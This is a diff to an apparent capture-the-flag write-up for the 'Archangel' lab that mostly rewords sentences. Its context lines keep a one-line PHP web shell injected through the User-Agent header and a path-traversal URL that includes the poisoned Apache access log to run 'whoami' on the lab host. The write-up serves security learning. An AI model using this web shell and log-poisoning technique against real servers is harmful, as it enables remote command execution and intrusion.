Sgt-Hartmann/Write-ups/Archangel/README.md

-Now it's time to fire up BurpSuite.
+Using BurpSuite.
-We'll put the php web shell in the User-Agent string:
+We will put the php web shell in the User-Agent string:
 ```
 <?php echo system($_GET['cmd']); ?>
 ```
 ![](https://github.com/user-attachments/assets/2cf45042-de12-4575-aba6-f3416c552bbc)

-And we'll try if it's working by injecting `&cmd=whoami` in the URL:
+And we will try if it's working by injecting `&cmd=whoami` in the URL:
 ```
 http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//..//..//..//../var/log/apache2/access.log&cmd=whoami
 ```